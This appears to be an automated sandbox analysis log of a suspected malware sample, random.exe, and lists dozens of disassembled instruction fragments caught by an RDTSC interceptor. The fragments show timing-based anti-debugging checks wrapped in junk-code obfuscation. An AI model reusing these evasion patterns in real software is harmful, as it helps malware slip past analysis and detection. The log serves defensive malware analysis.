            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860B30 second address: 4860B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-04h], 00000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860B4A second address: 4860B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860B67 second address: 4860B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c pushad 0x0000000d mov al, dh 0x0000000f mov ecx, 21229CEDh 0x00000014 popad 0x00000015 je 00007F8874D4CCB3h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov si, di 0x00000021 mov si, di 0x00000024 popad 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860B8C second address: 4860B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860BDD second address: 4860BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 push ecx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8874D4CC8Dh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860BF7 second address: 4860C3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F887475EDA3h 0x00000012 jmp 00007F887475EDA8h 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860C3C second address: 485009F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007F8874D4CDEFh 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F887898DD45h 0x00000027 mov edi, edi 0x00000029 jmp 00007F8874D4CC8Fh 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 push eax 0x00000031 pushfd 0x00000032 jmp 00007F8874D4CC8Bh 0x00000037 xor ecx, 7C3AAA0Eh 0x0000003d jmp 00007F8874D4CC99h 0x00000042 popfd 0x00000043 pop eax 0x00000044 push edi 0x00000045 jmp 00007F8874D4CC8Ch 0x0000004a pop esi 0x0000004b popad 0x0000004c push eax 0x0000004d jmp 00007F8874D4CC90h 0x00000052 xchg eax, ebp 0x00000053 jmp 00007F8874D4CC90h 0x00000058 mov ebp, esp 0x0000005a pushad 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F8874D4CC8Ch 0x00000062 sbb esi, 19B14E18h 0x00000068 jmp 00007F8874D4CC8Bh 0x0000006d popfd 0x0000006e mov esi, 2967F1CFh 0x00000073 popad 0x00000074 push eax 0x00000075 push edx 0x00000076 push ecx 0x00000077 pop edi 0x00000078 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 485009F second address: 48500AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 2Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48500AF second address: 48500B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48500B3 second address: 48500B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48500B7 second address: 48500BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48500BD second address: 48500C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48500C3 second address: 48500C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48500C7 second address: 48500FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, 9E54h 0x00000010 pushfd 0x00000011 jmp 00007F887475ED9Dh 0x00000016 sbb esi, 70568116h 0x0000001c jmp 00007F887475EDA1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48500FE second address: 4850154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8874D4CC91h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F8874D4CC93h 0x00000019 jmp 00007F8874D4CC93h 0x0000001e popfd 0x0000001f mov edx, esi 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850154 second address: 485015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5536h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 485015D second address: 4850181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8874D4CC96h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov di, cx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48501AE second address: 48501D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F887475ED9Ch 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48501D4 second address: 4850221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov ah, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a inc ebx 0x0000000b jmp 00007F8874D4CC94h 0x00000010 test al, al 0x00000012 pushad 0x00000013 call 00007F8874D4CC8Eh 0x00000018 mov bl, ah 0x0000001a pop ebx 0x0000001b mov al, 68h 0x0000001d popad 0x0000001e je 00007F8874D4CEC3h 0x00000024 pushad 0x00000025 mov cx, di 0x00000028 mov ax, bx 0x0000002b popad 0x0000002c lea ecx, dword ptr [ebp-14h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850221 second address: 4850225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850225 second address: 485022B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850292 second address: 48502D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F887475EDA3h 0x00000013 jmp 00007F887475EDA3h 0x00000018 popfd 0x00000019 push ecx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48502D2 second address: 48502D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48502D8 second address: 48502DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48502DC second address: 48502FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8874D4CC94h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48502FD second address: 4850301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850301 second address: 4850307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850307 second address: 4850318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F887475ED9Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850318 second address: 485031C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850354 second address: 4850363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850363 second address: 48503F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F8874D4CC8Eh 0x00000010 jg 00007F88E749AD82h 0x00000016 jmp 00007F8874D4CC90h 0x0000001b js 00007F8874D4CD27h 0x00000021 pushad 0x00000022 mov al, 52h 0x00000024 pushfd 0x00000025 jmp 00007F8874D4CC93h 0x0000002a xor si, 2B0Eh 0x0000002f jmp 00007F8874D4CC99h 0x00000034 popfd 0x00000035 popad 0x00000036 cmp dword ptr [ebp-14h], edi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e mov ebx, 74DEF79Ch 0x00000043 popad 0x00000044 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48503F1 second address: 4850406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F887475EDA1h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850406 second address: 485040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 485040A second address: 485041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F88E6EACE1Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 485041E second address: 4850422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850422 second address: 4850426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850426 second address: 485042C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 485042C second address: 4850456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F887475EDA7h 0x00000008 pop ecx 0x00000009 movsx edx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebx, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850456 second address: 485045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 485045A second address: 4850477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850477 second address: 485047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 485047D second address: 4850481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850481 second address: 48504D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-2Ch] 0x0000000e jmp 00007F8874D4CC96h 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 movzx eax, bx 0x00000018 mov dh, ABh 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007F8874D4CC8Eh 0x00000024 pop ecx 0x00000025 mov bx, 14D6h 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48504D3 second address: 48504EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F887475EDA3h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48504EA second address: 4850552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007F8874D4CC8Bh 0x00000018 sbb si, F36Eh 0x0000001d jmp 00007F8874D4CC99h 0x00000022 popfd 0x00000023 popad 0x00000024 nop 0x00000025 jmp 00007F8874D4CC8Eh 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850552 second address: 4850556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850556 second address: 4850572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850572 second address: 48505A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F887475EDA1h 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F887475EDA9h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48505A7 second address: 48505C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov bh, 48h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8874D4CC91h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48505C5 second address: 48505F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F887475EDA7h 0x00000008 mov bx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov edi, 43DF5FD6h 0x00000015 mov ebx, 5BC9A362h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48505F9 second address: 48505FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48505FD second address: 4850603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 485063D second address: 4850641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850641 second address: 485065E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 485065E second address: 48506A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F8874D4CC93h 0x00000013 pop eax 0x00000014 jmp 00007F8874D4CC99h 0x00000019 popad 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4840D5B second address: 4840D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4840D61 second address: 4840D9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F8874D4CC96h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8874D4CC8Eh 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4840D9A second address: 4840DC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F887475EDA5h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850A97 second address: 4850A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850A9D second address: 4850AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850AA1 second address: 4850AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850AA5 second address: 4850AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F887475EDA7h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 movzx esi, bx 0x00000016 popad 0x00000017 cmp dword ptr [76FF459Ch], 05h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F887475EDA4h 0x00000026 pop ecx 0x00000027 mov si, di 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850AF1 second address: 4850AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850AF7 second address: 4850AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850AFB second address: 4850B9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F88E748AB6Eh 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F8874D4CC99h 0x0000001c xor si, 7FF6h 0x00000021 jmp 00007F8874D4CC91h 0x00000026 popfd 0x00000027 pop eax 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F8874D4CC98h 0x00000033 or eax, 724C5848h 0x00000039 jmp 00007F8874D4CC8Bh 0x0000003e popfd 0x0000003f jmp 00007F8874D4CC98h 0x00000044 popad 0x00000045 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850C1D second address: 4850C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850C21 second address: 4850C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8874D4CC91h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850C3F second address: 4850C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov cl, 4Fh 0x0000000d mov cx, bx 0x00000010 popad 0x00000011 call 00007F88E6EA3CACh 0x00000016 push 76F92B70h 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov eax, dword ptr [esp+10h] 0x00000026 mov dword ptr [esp+10h], ebp 0x0000002a lea ebp, dword ptr [esp+10h] 0x0000002e sub esp, eax 0x00000030 push ebx 0x00000031 push esi 0x00000032 push edi 0x00000033 mov eax, dword ptr [76FF4538h] 0x00000038 xor dword ptr [ebp-04h], eax 0x0000003b xor eax, ebp 0x0000003d push eax 0x0000003e mov dword ptr [ebp-18h], esp 0x00000041 push dword ptr [ebp-08h] 0x00000044 mov eax, dword ptr [ebp-04h] 0x00000047 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004e mov dword ptr [ebp-08h], eax 0x00000051 lea eax, dword ptr [ebp-10h] 0x00000054 mov dword ptr fs:[00000000h], eax 0x0000005a ret 0x0000005b pushad 0x0000005c mov dh, 33h 0x0000005e jmp 00007F887475ED9Ah 0x00000063 popad 0x00000064 sub esi, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850C77 second address: 4850C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850C7B second address: 4850C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850C81 second address: 4850C95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-1Ch], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850C95 second address: 4850C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4850C99 second address: 4850C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860C81 second address: 4860CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F887475ED9Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, E4B3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860CAB second address: 4860CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860CB0 second address: 4860CE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F887475ED9Eh 0x00000013 sub eax, 338DA9E8h 0x00000019 jmp 00007F887475ED9Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860CE9 second address: 4860D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8874D4CC94h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860D01 second address: 4860D26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov di, si 0x00000011 mov si, CFB7h 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov eax, edx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860D26 second address: 4860D2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
